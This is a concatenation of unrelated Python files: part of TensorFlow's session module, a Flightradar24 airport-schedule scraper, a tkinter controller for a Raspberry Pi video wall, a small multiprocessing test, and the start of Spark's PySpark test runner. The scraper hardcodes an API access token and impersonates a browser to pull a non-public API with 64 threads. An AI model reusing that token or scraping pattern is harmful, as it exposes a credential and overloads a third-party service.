fetch_handler,
options=None,
run_metadata=None):
"""Template callable that accepts RunOptions and RunMetadata."""
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(options.SerializeToString())) if options else None
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
try:
results = self._call_tf_sessionrun(options_ptr, {}, fetch_list,
target_list, run_metadata_ptr)
if fetch_handler:
results = fetch_handler.build_results(self, results)
else:
results = results[0] if results else None
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
if options:
tf_session.TF_DeleteBuffer(options_ptr)
return results
if accept_options:
return functools.partial(_callable_template_with_options_and_metadata,
fetch_list, target_list, fetch_handler)
elif isinstance(fetches, ops.Operation):
# Special case for fetching a single operation, because the
# function will have no return value.
assert not fetch_list
assert len(target_list) == 1
def _single_operation_run():
self._call_tf_sessionrun(None, {}, [], target_list, None)
return _single_operation_run
elif isinstance(fetches, ops.Tensor):
# Special case for fetching a single tensor, because the
# function can return the result of `TF_Run()` directly.
assert len(fetch_list) == 1
assert not target_list
def _single_tensor_run():
results = self._call_tf_sessionrun(None, {}, fetch_list, [], None)
return results[0]
return _single_tensor_run
else:
# In all other cases, we must use `fetch_handler` to build the
# results for us.
def _fetch_handler_run():
results = self._call_tf_sessionrun(None, {}, fetch_list, target_list,
None)
return fetch_handler.build_results(self, results)
return _fetch_handler_run
# Captures the name of a node in an error status. The regex below matches
# both the old and the new formats:
# Old format: [[Node: <node_name> = ...]]
# New format: [[{{node <node_name>}} = ...]]
_NODEDEF_NAME_RE = re.compile(
r'\[\[(Node: )?(\{\{node )?([^\} ]*)(\}\})?\s*=*')
def _do_run(self, handle, target_list, fetch_list, feed_dict, options,
run_metadata):
"""Runs a step based on the given fetches and feeds.
Args:
handle: a handle for partial_run. None if this is just a call to run().
target_list: A list of operations to be run, but not fetched.
fetch_list: A list of tensors to be fetched.
feed_dict: A dictionary that maps tensors to numpy ndarrays.
options: A (pointer to a) [`RunOptions`] protocol buffer, or None
run_metadata: A (pointer to a) [`RunMetadata`] protocol buffer, or None
Returns:
A list of numpy ndarrays, corresponding to the elements of
`fetch_list`. If the ith element of `fetch_list` contains the
name of an operation, the first Tensor output of that operation
will be returned for that element.
Raises:
tf.errors.OpError: Or one of its subclasses on error.
"""
# pylint: disable=protected-access
feeds = dict((t._as_tf_output(), v) for t, v in feed_dict.items())
fetches = [t._as_tf_output() for t in fetch_list]
targets = [op._c_op for op in target_list]
# pylint: enable=protected-access
def _run_fn(feed_dict, fetch_list, target_list, options, run_metadata):
# Ensure any changes to the graph are reflected in the runtime.
self._extend_graph()
return self._call_tf_sessionrun(options, feed_dict, fetch_list,
target_list, run_metadata)
def _prun_fn(handle, feed_dict, fetch_list):
if target_list:
raise RuntimeError('partial_run() requires empty target_list.')
return self._call_tf_sessionprun(handle, feed_dict, fetch_list)
if handle is None:
return self._do_call(_run_fn, feeds, fetches, targets, options,
run_metadata)
else:
return self._do_call(_prun_fn, handle, feeds, fetches)
def _do_call(self, fn, *args):
try:
return fn(*args)
except errors.OpError as e:
message = compat.as_text(e.message)
m = BaseSession._NODEDEF_NAME_RE.search(message)
node_def = None
op = None
if m is not None:
node_name = m.group(3)
try:
op = self._graph.get_operation_by_name(node_name)
node_def = op.node_def
except KeyError:
pass
message = error_interpolation.interpolate(message, self._graph)
if 'only supports NHWC tensor format' in message:
message += ('\nA possible workaround: Try disabling Grappler optimizer'
'\nby modifying the config for creating the session eg.'
'\nsession_config.graph_options.rewrite_options.'
'disable_meta_optimizer = True')
raise type(e)(node_def, op, message)
def _extend_graph(self):
with self._graph._session_run_lock(): # pylint: disable=protected-access
tf_session.ExtendSession(self._session)
# The threshold to run garbage collection to delete dead tensors.
_DEAD_HANDLES_THRESHOLD = 10
def _register_dead_handle(self, handle):
# Register a dead handle in the session. Delete the dead tensors when
# the number of dead tensors exceeds certain threshold.
tensors_to_delete = None
with self._delete_lock:
self._dead_handles.append(handle)
if len(self._dead_handles) == BaseSession._DEAD_HANDLES_THRESHOLD:
tensors_to_delete = self._dead_handles
self._dead_handles = []
# Delete the dead tensors.
if tensors_to_delete:
feeds = {}
fetches = []
for deleter_key, tensor_handle in enumerate(tensors_to_delete):
holder, deleter = session_ops._get_handle_deleter(
self.graph, deleter_key, tensor_handle)
feeds[holder] = tensor_handle
fetches.append(deleter)
self.run(fetches, feed_dict=feeds)
def _update_with_movers(self, feed_dict, feed_map):
# If a tensor handle that is fed to a device incompatible placeholder,
# we move the tensor to the right device, generate a new tensor handle,
# and update `feed_dict` to use the new handle.
handle_movers = []
for feed_name, val in feed_map.items():
mover = session_ops._get_handle_mover(self.graph, *val)
if mover:
handle_movers.append((feed_name, val[1], mover))
# Transfer a tensor to the right device if needed.
if not handle_movers:
return []
else:
feeds = {}
fetches = []
for _, handle, mover in handle_movers:
feeds[mover[0]] = handle
fetches.append(mover[1])
handles = self.run(fetches, feed_dict=feeds)
for handle_mover, handle in zip(handle_movers, handles):
np_val = np.array(handle.handle, dtype=np.object)
feed_name = handle_mover[0]
feed_tensor = feed_map[feed_name][0]
feed_dict[feed_tensor] = np_val
return handles
def _call_tf_sessionrun(self, options, feed_dict, fetch_list, target_list,
run_metadata):
return tf_session.TF_SessionRun_wrapper(self._session, options, feed_dict,
fetch_list, target_list,
run_metadata)
def _call_tf_sessionprun(self, handle, feed_dict, fetch_list):
return tf_session.TF_SessionPRun_wrapper(self._session, handle, feed_dict,
fetch_list)
# pylint: disable=protected-access
class _Callable(object):
"""Experimental wrapper for the C++ `Session::MakeCallable()` API."""
def __init__(self, session, callable_options):
self._session = session
self._handle = None
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(callable_options.SerializeToString()))
try:
self._handle = tf_session.TF_SessionMakeCallable(
session._session, options_ptr)
finally:
tf_session.TF_DeleteBuffer(options_ptr)
def __call__(self, *args, **kwargs):
# TODO(b/74355905): Support argument and return value nested structures,
# and tensor-like objects such as SparseTensors.
run_metadata = kwargs.get('run_metadata', None)
try:
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
ret = tf_session.TF_SessionRunCallable(self._session._session,
self._handle, args,
run_metadata_ptr)
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
return ret
def __del__(self):
# NOTE(mrry): It is possible that `self._session.__del__()` could be
# called before this destructor, in which case `self._session._session`
# will be `None`.
if (self._handle is not None and self._session._session is not None and
not self._session._closed):
tf_session.TF_SessionReleaseCallable(self._session._session,
self._handle)
# pylint: enable=protected-access
# TODO(b/74355905): Reimplement `Session.make_callable()` using this method
# where possible.
def _make_callable_from_options(self, callable_options):
"""Returns a handle to a "callable" with the given options.
Args:
callable_options: A `CallableOptions` protocol buffer message describing
the computation that will be performed by the callable.
Returns:
A handle to the new callable.
"""
self._extend_graph()
return BaseSession._Callable(self, callable_options)
@tf_export(v1=['Session'])
class Session(BaseSession):
"""A class for running TensorFlow operations.
A `Session` object encapsulates the environment in which `Operation`
objects are executed, and `Tensor` objects are evaluated. For
example:
```python
# Build a graph.
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
# Launch the graph in a session.
sess = tf.compat.v1.Session()
# Evaluate the tensor `c`.
print(sess.run(c))
```
A session may own resources, such as
`tf.Variable`, `tf.queue.QueueBase`,
and `tf.compat.v1.ReaderBase`. It is important to release
these resources when they are no longer required. To do this, either
invoke the `tf.Session.close` method on the session, or use
the session as a context manager. The following two examples are
equivalent:
```python
# Using the `close()` method.
sess = tf.compat.v1.Session()
sess.run(...)
sess.close()
# Using the context manager.
with tf.compat.v1.Session() as sess:
sess.run(...)
```
The
[`ConfigProto`](https://www.tensorflow.org/code/tensorflow/core/protobuf/config.proto)
protocol buffer exposes various configuration options for a
session. For example, to create a session that uses soft constraints
for device placement, and log the resulting placement decisions,
create a session as follows:
```python
# Launch the graph in a session that allows soft device placement and
# logs the placement decisions.
sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(
allow_soft_placement=True,
log_device_placement=True))
```
"""
def __init__(self, target='', graph=None, config=None):
"""Creates a new TensorFlow session.
If no `graph` argument is specified when constructing the session,
the default graph will be launched in the session. If you are
using more than one graph (created with `tf.Graph()`) in the same
process, you will have to use different sessions for each graph,
but each graph can be used in multiple sessions. In this case, it
is often clearer to pass the graph to be launched explicitly to
the session constructor.
Args:
target: (Optional.) The execution engine to connect to. Defaults to using
an in-process engine. See
[Distributed TensorFlow](https://tensorflow.org/deploy/distributed) for
more examples.
graph: (Optional.) The `Graph` to be launched (described above).
config: (Optional.) A
[`ConfigProto`](https://www.tensorflow.org/code/tensorflow/core/protobuf/config.proto)
protocol buffer with configuration options for the session.
"""
super(Session, self).__init__(target, graph, config=config)
# NOTE(mrry): Create these on first `__enter__` to avoid a reference cycle.
self._default_graph_context_manager = None
self._default_session_context_manager = None
def __enter__(self):
if self._default_graph_context_manager is None:
self._default_graph_context_manager = self.graph.as_default()
else:
raise RuntimeError('Session context managers are not re-entrant. '
'Use `Session.as_default()` if you want to enter '
'a session multiple times.')
if self._default_session_context_manager is None:
self._default_session_context_manager = self.as_default()
self._default_graph_context_manager.__enter__()
return self._default_session_context_manager.__enter__()
def __exit__(self, exec_type, exec_value, exec_tb):
if exec_type is errors.OpError:
logging.error('Session closing due to OpError: %s', (exec_value,))
try:
self._default_session_context_manager.__exit__(exec_type, exec_value,
exec_tb)
except RuntimeError as error:
if error == exec_value:
# NOTE(skyewm): for some reason, in Python3,
# _default_session_context_manager.__exit__ will re-raise the "not
# re-entrant" exception raised in __enter__ above (note that if we're
# here, we're in the outer session context manager, since __exit__ is
# not called when __enter__ raises an exception). We still want to
# continue cleaning up this context manager before the exception is
# further propagated, so we ignore it here (note that it'll continue
# being propagated after this method completes).
pass
else:
raise
self._default_graph_context_manager.__exit__(exec_type, exec_value, exec_tb)
self._default_session_context_manager = None
self._default_graph_context_manager = None
# If we are closing due to an exception, set a time limit on our Close() to
# avoid blocking forever.
# TODO(b/120204635) remove this when deadlock is fixed.
if exec_type:
close_thread = threading.Thread(
name='SessionCloseThread', target=self.close)
close_thread.daemon = True
close_thread.start()
close_thread.join(30.0)
if close_thread.is_alive():
logging.error(
'Session failed to close after 30 seconds. Continuing after this '
'point may leave your program in an undefined state.')
else:
self.close()
@staticmethod
def reset(target, containers=None, config=None):
"""Resets resource containers on `target`, and close all connected sessions.
A resource container is distributed across all workers in the
same cluster as `target`. When a resource container on `target`
is reset, resources associated with that container will be cleared.
In particular, all Variables in the container will become undefined:
they lose their values and shapes.
NOTE:
(i) reset() is currently only implemented for distributed sessions.
(ii) Any sessions on the master named by `target` will be closed.
If no resource containers are provided, all containers are reset.
Args:
target: The execution engine to connect to.
containers: A list of resource container name strings, or `None` if all of
all the containers are to be reset.
config: (Optional.) Protocol buffer with configuration options.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
resetting containers.
"""
if target is not None:
target = compat.as_bytes(target)
if containers is not None:
containers = [compat.as_bytes(c) for c in containers]
else:
containers = []
tf_session.TF_Reset(target, containers, config)
@tf_export(v1=['InteractiveSession'])
class InteractiveSession(BaseSession):
"""A TensorFlow `Session` for use in interactive contexts, such as a shell.
The only difference with a regular `Session` is that an `InteractiveSession`
installs itself as the default session on construction.
The methods `tf.Tensor.eval`
and `tf.Operation.run`
will use that session to run ops.
This is convenient in interactive shells and [IPython
notebooks](http://ipython.org), as it avoids having to pass an explicit
`Session` object to run ops.
For example:
```python
sess = tf.compat.v1.InteractiveSession()
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
# We can just use 'c.eval()' without passing 'sess'
print(c.eval())
sess.close()
```
Note that a regular session installs itself as the default session when it
is created in a `with` statement. The common usage in non-interactive
programs is to follow that pattern:
```python
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
with tf.compat.v1.Session():
# We can also use 'c.eval()' here.
print(c.eval())
```
"""
_count_lock = threading.Lock()
_active_session_count = 0 # GUARDED_BY(_count_lock)
def __init__(self, target='', graph=None, config=None):
"""Creates a new interactive TensorFlow session.
If no `graph` argument is specified when constructing the session,
the default graph will be launched in the session. If you are
using more than one graph (created with `tf.Graph()`) in the same
process, you will have to use different sessions for each graph,
but each graph can be used in multiple sessions. In this case, it
is often clearer to pass the graph to be launched explicitly to
the session constructor.
Args:
target: (Optional.) The execution engine to connect to. Defaults to using
an in-process engine.
graph: (Optional.) The `Graph` to be launched (described above).
config: (Optional) `ConfigProto` proto used to configure the session.
"""
if not config:
# If config is not provided, choose some reasonable defaults for
# interactive use:
#
# - Grow GPU memory as needed at the cost of fragmentation.
gpu_options = config_pb2.GPUOptions(allow_growth=True)
config = config_pb2.ConfigProto(gpu_options=gpu_options)
# Interactive sessions always place pruned graphs.
config.graph_options.place_pruned_graph = True
super(InteractiveSession, self).__init__(target, graph, config)
with InteractiveSession._count_lock:
if InteractiveSession._active_session_count > 0:
warnings.warn('An interactive session is already active. This can '
'cause out-of-memory errors in some cases. You must '
'explicitly call `InteractiveSession.close()` to release '
'resources held by the other session(s).')
InteractiveSession._active_session_count += 1
# NOTE(mrry): We do not use `Session._closed` here because it has unhelpful
# semantics (in particular, it is not set to true if `Session.close()` is
# called on a session that has not been "opened" by running a step) and we
# cannot change those semantics without breaking existing code.
self._explicitly_closed = False
self._default_session = self.as_default()
self._default_session.enforce_nesting = False
self._default_session.__enter__()
self._explicit_graph = graph
if self._explicit_graph is not None:
self._default_graph = graph.as_default()
self._default_graph.enforce_nesting = False
self._default_graph.__enter__()
def close(self):
"""Closes an `InteractiveSession`."""
super(InteractiveSession, self).close()
with InteractiveSession._count_lock:
if not self._explicitly_closed:
InteractiveSession._active_session_count -= 1
self._explicitly_closed = True
else:
return
if self._explicit_graph is not None:
self._default_graph.__exit__(None, None, None)
self._default_graph = None
self._default_session.__exit__(None, None, None)
self._default_session = None
|
loop_through_airport_multithread.py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 26 14:49:33 2019
@author: Rafael Amancio Diegues
Collect all arrivals and depart data for each airport, writing it all in a file
"""
import requests, json
import threading
import csv
import math
import time, calendar
import os
def flightsInAirportRequest(IATAcode, page):
resp = APIrequest()
jsonParse = request2JSON(resp)
jsonFlightsNode = JSON2FlightNode(jsonParse)
if jsonFlightsNode == '':
FlightsFile.write('JSON reading error;' + str(resp.status_code) + ';' + resp.url + ';' + IATAcode + ';' + str(page) +
';' + str(resp.content) + '\n')
return
for i in range(len(jsonFlightsNode)):
flight = jsonFlightsNode[i]['flight']
flightDataFilter(flight)
if flightDataFilter:
writeFlight2File(flight, jsonParse['result']['request']['code'])
def request2JSON(resp):
try:
jsonParse = json.loads(resp.text)
except:
jsonParse = ''
return jsonParse
def JSON2FlightNode(JSON):
try:
flightNode = JSON['result']['response']['airport']['pluginData']['schedule'][parametersRequest['plugin-setting[schedule][mode]']]['data']
except:
flightNode = ''
return flightNode
def flightDataFilter(flight):
# Só quero de um dia, não quero os com status scheduled
'''Filtering, excluing some data'''
# Only the last day
'''flight_timestamp = flight['time']['scheduled']['departure']
current_time = time.gmtime()
yesterday_timestamp = calendar.timegm((current_time.tm_year, current_time.tm_mon, current_time.tm_mday - 1,
0, 0, 0, current_time.tm_wday -1, current_time.tm_yday, current_time.tm_isdst))
today_timestamp = calendar.timegm((current_time.tm_year, current_time.tm_mon, current_time.tm_mday,
0, 0, 0, current_time.tm_wday, current_time.tm_yday, current_time.tm_isdst))
#if not( yesterday_timestamp < flight_timestamp and flight_timestamp < today_timestamp): continue'''
return True
def airportsChunkTread(start, end, AirportsList):
if testMode == 1:
parametersRequest['page'] = 0
parametersRequest['plugin-setting[schedule][mode]'] = 'arrivals'
for airportRow in range(start,start+1):
IATAcode = AirportsList[airportRow][2][0:3].lower()
parametersRequest['code'] = IATAcode
print('Airport number ' + str(airportRow) )
flightsInAirportRequest(IATAcode, 0)
else:
for pageNumber in range(1,-10, -1):
parametersRequest['page'] = pageNumber
for j in ['arrivals']:#, 'departures']:
parametersRequest['plugin-setting[schedule][mode]'] = j
for airportRow in range(start, end, 1):
IATAcode = AirportsList[airportRow][2][0:3].lower()
parametersRequest['code'] = IATAcode
#print('\033[H\033[J')
print('Page number: {0} Airport number: {1:>4} Airport code: {2}'.format(
str(pageNumber), str(airportRow), IATAcode))
flightsInAirportRequest(IATAcode, pageNumber)
def writeFlight2File(flight, IATAcode):
# Mapping through the dict
flightMappingKeys = [['identification','number','default'],
['status','text'],
['aircraft','model','text'],
['aircraft','registration'],
['owner','name'],
['airline','name'],
['airport','origin','code','iata'],
['airport','origin','info','terminal'],
['airport','origin','info','gate'],
['airport','destination','code','iata'],
['airport','destination','info','terminal'],
['airport','destination','info','gate'],
['time','scheduled','departure'],
['time','scheduled','arrival'],
['time','real','departure'],
['time','real','arrival'],
['time','other','duration']]
flightDataToPrint = []
for keys in flightMappingKeys:
try:
flightParameter = dictNavigate(flight, keys)
except:
if 'iata' in keys:
flightParameter = IATAcode
else:
flightParameter = 'Null'
flightDataToPrint.append(flightParameter)
# Printing the file
flightPrintFormat = ''
for i in range(len(flightMappingKeys)):
flightPrintFormat = flightPrintFormat + '{d[' + str(i) + ']};'
flightPrintFormat = flightPrintFormat[:-1] + '\r\n'
FlightsFile.write(flightPrintFormat[:-1].format(d = flightDataToPrint))
def dictNavigate(dic, Keys):
result = dic
for k in Keys:
result = result[k]
return result
def APIrequest():
resp = requests.get('https://api.flightradar24.com/common/v1/airport.json',
headers = headersRequest, params = parametersRequest)
if resp.status_code != 200:
resp = requests.get(resp.url, headers = headersRequest)
return resp
if __name__ == '__main__':
startTime = time.time()
testMode = 0
# Importing the csv file to a matrix
scriptDirectory = os.path.dirname(__file__)
AirportsFile = open(os.path.join(scriptDirectory,'data/Airports_list.csv'), 'r')
AirportsList = list(csv.reader(AirportsFile))
if testMode == 1:
AirportsList = [['', '', 'EZE', '', '', ''], ['', '', 'GRU', '', '', '']]
# Creating and setting new file where the dara will be written
FlightsFile = open(os.path.join(scriptDirectory,'data/flight_data.txt'),'w', encoding='utf-8')
formatFlightsStr = '{0};{1};{2};{3};{4};{5};{6};{7};{8};{9};{10};{11};{12};{13};{14};{15};{16}\n'
FlightsFile.write(formatFlightsStr.format('Flight number', 'Status', 'Airplane Model', 'Airplane registration', 'Airplane owner', 'Airline',
'Origin', 'Origin Terminal', 'Origin Gate', 'Destination', 'Destination Terminal', 'Destination Gate',
'Scheduled departure', 'Scheduled arrival', 'Real departure', 'Real arrival', 'Duration'))
# Setting internet parameters
headersRequest = {'Host': 'api.flightradar24.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0'}
currentTimestamp = calendar.timegm(time.gmtime())
parametersRequest = {'code': '', 'plugin[]': '', 'plugin-setting[schedule][mode]': 'arrivals',
'plugin-settings[schedule][timestamp]': str(currentTimestamp), 'page': '0', 'limit': '100',
'token': 'OqXb3FuvDi5WJmBHxxrEo27LzBKwU1VWO7-ITM9ASec'}
# Multithreading processig
threadsCount = 64 # Basic formula: 2 * (number of cores)
jobsCount = len(AirportsList)
threadsList = []
for i in range(threadsCount):
start = math.floor(i * jobsCount / threadsCount)
end = math.floor((i + 1) * jobsCount / threadsCount)
threadsList.append(threading.Thread(target=airportsChunkTread, args=(start, end, AirportsList)))
# Executing the threads
for thread in threadsList:
thread.start()
for thread in threadsList:
thread.join()
# Ending
AirportsFile.close()
FlightsFile.close()
elapsedTime = time.time() - startTime
print('The total elapsed time was ' + str(elapsedTime))
|
main.py
|
"""
GUI Application to control the PiWall from
"""
#!/usr/bin/python3
# Author: Gunnar Holwerda
# GUI to control a PiWall
from tkinter import Frame, StringVar, OptionMenu, Listbox, Button, Label, Tk, END
from piwallcontroller.piwallcontroller import PiWallController
from piwallcontroller.playlist import Playlist
from threading import Thread
class SelectorWindow(Frame):
"""
GUI Class extending the tkinter.Frame class
"""
TIMEOUTS = {
'1 hour ': 3600,
'2 hours': 7200,
'3 hours': 10800,
'Infinite': -1,
}
def __init__(self, master=None):
Frame.__init__(self, master)
self.__playlist = Playlist()
self.__controller = PiWallController()
self.__dropdown_selection = StringVar()
self.__timeout_selection = StringVar()
self.__command_thread = Thread(
target=self.__controller.run_commands, args=(self.__playlist,))
self.grid()
self.create_video_file_dropdown()
self.create_timeout_dropdown()
self.create_display_box()
self.create_add_button()
self.create_delete_button()
self.create_play_button()
self.create_reboot_button()
self.create_status_label()
self.create_stop_button()
def create_video_file_dropdown(self):
"""
Creates the dropdown to display the video files from
"""
videos = self.__controller.get_video_file_list()
if videos:
self.__dropdown_selection.set(videos[0])
else:
videos.append(None)
self.video_dropdown = OptionMenu(
None, self.__dropdown_selection, *videos)
self.video_dropdown.config(width=10)
self.video_dropdown.grid(row=0, column=0)
def create_timeout_dropdown(self):
"""
Creates the dropdown that displays the timeouts
"""
timeouts = list(self.TIMEOUTS.keys())
timeouts.sort()
self.__timeout_selection.set(timeouts[0])
self.timeout_dropdown = OptionMenu(
None, self.__timeout_selection, *timeouts)
self.timeout_dropdown.config(width=5)
self.timeout_dropdown.grid(row=0, column=1)
def create_display_box(self):
"""
Creates display box that displays all current items in the playlist
"""
self.display_box = Listbox(width=30, height=10)
self.display_box.grid(row=0, column=2, columnspan=2)
def create_play_button(self):
"""
Creates the play button
"""
self.submit_button = Button(text="Play", width=10)
self.submit_button['command'] = self.play_wall
self.submit_button.grid(row=1, column=2, pady=5)
def create_add_button(self):
"""
Creates the button to add the current values in the video and timeout dropdown
into the playlist
"""
self.add_button = Button(text='Add', fg='green', width=10)
self.add_button['command'] = self.update_display_box
self.add_button.grid(row=1, column=0, pady=5)
def create_delete_button(self):
"""
Creates delete button to delete items from display blox
"""
self.delete_button = Button(text='Delete', fg='red', width=10)
self.delete_button['command'] = self.delete_selected_item
self.delete_button.grid(row=1, column=1, pady=5)
def create_reboot_button(self):
"""
Creates button that reboots the pi's
"""
self.reboot_button = Button(text='Reboot Tiles', fg='red', width=10)
self.reboot_button['command'] = self.reboot_pressed
self.reboot_button.grid(row=1, column=3, pady=5)
def create_status_label(self):
"""
Creates label to display current status of the wall
"""
self.status_label = Label(relief="ridge", width=11)
self.set_status_label(0)
self.status_label.grid(row=2, column=3, pady=5)
def create_stop_button(self):
"""
Creates stop button to stop PiWall
"""
self.stop_button = Button(text='Stop Playing')
self.set_status_label(0)
self.stop_button['command'] = self.stop_pressed
self.stop_button.grid(row=2, column=2, pady=5)
def delete_selected_item(self):
"""
Deletes the currently selected item from the displaybox
"""
self.__playlist.remove_playlist_item(self.display_box.curselection())
self.display_box.delete(self.display_box.curselection())
def play_wall(self):
"""
Submits ths form to be played on the pi's
"""
if self.__playlist.is_empty():
return
self.set_status_label(1)
self.display_box.delete(0, END)
# If there is a thread running, we need to stop the wall, which will
# end the thread
if self.__command_thread.isAlive():
print("Stopping Wall")
self.__controller.stop_wall()
self.__command_thread.join()
self.__command_thread = Thread(
target=self.__controller.run_commands, args=(self.__playlist,))
self.__command_thread.start()
def update_display_box(self):
"""
Button listener for the Add Button (create_add_button)
"""
video_file = self.__dropdown_selection.get()
timeout = self.__timeout_selection.get()
self.__playlist.add_playlist_item(video_file, self.TIMEOUTS[timeout])
self.display_box.insert(END, "{0} {1}".format(timeout, video_file))
def stop_pressed(self):
"""
Button listener for the Stop Button (create_stop_button)
"""
self.__controller.stop_wall()
self.set_status_label(0)
def reboot_pressed(self):
"""
Button listener for the Reboot Button (create_reboot_button)
"""
self.set_status_label(0)
self.__controller.reboot_pis()
return True
def set_status_label(self, state):
"""
Updates the status label to the current status of the PiWall
"""
if state == 1:
self.status_label.config(text='Playing', fg='green')
return True
elif state == 0:
self.status_label.config(text='Not Playing', fg='red')
return True
else:
Exception(
'Status label state {0} not supported. Try 1 or 2'.format(state))
def get_controller(self):
"""
Returns the piwallcontrollers
"""
return self.__controller
# Run the GUI
if __name__ == "__main__":
tk_window = Tk(className="PiWall")
frame = SelectorWindow(master=tk_window)
tk_window.mainloop()
frame.get_controller().stop_wall()
|
hdf5_Hyst_parallel.py
|
import glob, os, sys
import h5py
import numpy as np
import matplotlib.pyplot as plt
import multiprocessing
def info(title):
print(title)
print('module name:', __name__)
print('parent process:', os.getppid())
print('process id:', os.getpid())
def f(name):
info('function f')
print('hello', name)
def f2(x):
return x*x
if __name__ == '__main__':
info('main line')
y=[1,2,3]
p = multiprocessing.Process(target=f2, args=1)
p.start()
p.join()
|
run-tests.py
|
#!/usr/bin/env python3
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
from argparse import ArgumentParser
import os
import re
import shutil
import subprocess
import sys
import tempfile
from threading import Thread, Lock
import time
import uuid
if sys.version < '3':
import Queue
else:
import queue as Queue
from multiprocessing import Manager
# Append `SPARK_HOME/dev` to the Python path so that we can import the sparktestsupport module
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), "../dev/"))
from sparktestsupport import SPARK_HOME # noqa (suppress pep8 warnings)
from sparktestsupport.shellutils import which, subprocess_check_output # noqa
from sparktestsupport.modules import all_modules, pyspark_sql # noqa
python_modules = dict((m.name, m) for m in all_modules if m.python_test_goals if m.name != 'root')
def print_red(text):
print('\033[31m' + text + '\033[0m')
SKIPPED_TESTS = Manager().dict()
LOG_FILE = os.path.join(SPARK_HOME, "python/unit-tests.log")
FAILURE_REPORTING_LOCK = Lock()
LOGGER = logging.getLogger()
# Find out where the assembly jars are located.
# TODO: revisit for Scala 2.13
for scala in ["2.12"]:
build_dir = os.path.join(SPARK_HOME, "assembly", "target", "scala-" + scala)
if os.path.isdir(build_dir):
SPARK_DIST_CLASSPATH = os.path.join(build_dir, "jars", "*")
break
else:
raise Exception("Cannot find assembly build directory, please build Spark first.")
def run_individual_python_test(target_dir, test_name, pyspark_python):
env = dict(os.environ)
env.update({
'SPARK_DIST_CLASSPATH': SPARK_DIST_CLASSPATH,
'SPARK_TESTING': '1',
'SPARK_PREPEND_CLASSES': '1',
'PYSPARK_PYTHON': which(pyspark_python),
'PYSPARK_DRIVER_PYTHON': which(pyspark_python)
})
# Create a unique temp directory under 'target/' for each run. The TMPDIR variable is
# recognized by the tempfile module to override the default system temp directory.
tmp_dir = os.path.join(target_dir, str(uuid.uuid4()))
while os.path.isdir(tmp_dir):
tmp_dir = os.path.join(target_dir, str(uuid.uuid4()))
os.mkdir(tmp_dir)
env["TMPDIR"] = tmp_dir
# Also override the JVM's temp directory by setting driver and executor options.
java_options = "-Djava.io.tmpdir={0} -Dio.netty.tryReflectionSetAccessible=true".format(tmp_dir)
spark_args = [
"--conf", "spark.driver.extraJavaOptions='{0}'".format(java_options),
"--conf", "spark.executor.extraJavaOptions='{0}'".format(java_options),
"pyspark-shell"
]
env["PYSPARK_SUBMIT_ARGS"] = " ".join(spark_args)
LOGGER.info("Starting test(%s): %s", pyspark_python, test_name)
start_time = time.time()
try:
per_test_output = tempfile.TemporaryFile()
retcode = subprocess.Popen(
[os.path.join(SPARK_HOME, "bin/pyspark")] + test_name.split(),
stderr=per_test_output, stdout=per_test_output, env=env).wait()
shutil.rmtree(tmp_dir, ignore_errors=True)
except:
LOGGER.exception("Got exception while running %s with %s", test_name, pyspark_python)
# Here, we use os._exit() instead of sys.exit() in order to force Python to exit even if
# this code is invoked from a thread other than the main thread.
os._exit(1)
duration = time.time() - start_time
# Exit on the first failure.
if retcode != 0:
try:
with FAILURE_REPORTING_LOCK:
with open(LOG_FILE, 'ab') as log_file:
per_test_output.seek(0)
log_file.writelines(per_test_output)
per_test_output.seek(0)
for line in per_test_output:
decoded_line = line.decode("utf-8", "replace")
if not re.match('[0-9]+', decoded_line):
print(decoded_line, end='')
per_test_output.close()
except:
LOGGER.exception("Got an exception while trying to print failed test output")
finally:
print_red("\nHad test failures in %s with %s; see logs." % (test_name, pyspark_python))
# Here, we use os._exit() instead of sys.exit() in order to force Python to exit even if
# this code is invoked from a thread other than the main thread.
os._exit(-1)
else:
skipped_counts = 0
try:
per_test_output.seek(0)
# Here expects skipped test output from unittest when verbosity level is
# 2 (or --verbose option is enabled).
decoded_lines = map(lambda line: line.decode("utf-8", "replace"), iter(per_test_output))
skipped_tests = list(filter(
lambda line: re.search(r'test_.* \(pyspark\..*\) ... (skip|SKIP)', line),
decoded_lines))
skipped_counts = len(skipped_tests)
if skipped_counts > 0:
key = (pyspark_python, test_name)
SKIPPED_TESTS[key] = skipped_tests
per_test_output.close()
except:
import traceback
print_red("\nGot an exception while trying to store "
"skipped test output:\n%s" % traceback.format_exc())
# Here, we use os._exit() instead of sys.exit() in order to force Python to exit even if
# this code is invoked from a thread other than the main thread.
os._exit(-1)
if skipped_counts != 0:
LOGGER.info(
"Finished test(%s): %s (%is) ... %s tests were skipped", pyspark_python, test_name,
duration, skipped_counts)
else:
LOGGER.info(
"Finished test(%s): %s (%is)", pyspark_python, test_name, duration)
def get_default_python_executables():
python_execs = [x for x in ["python3.6", "python2.7", "pypy"] if which(x)]
if "python3.6" not in python_execs:
p = which("python3")
if not p:
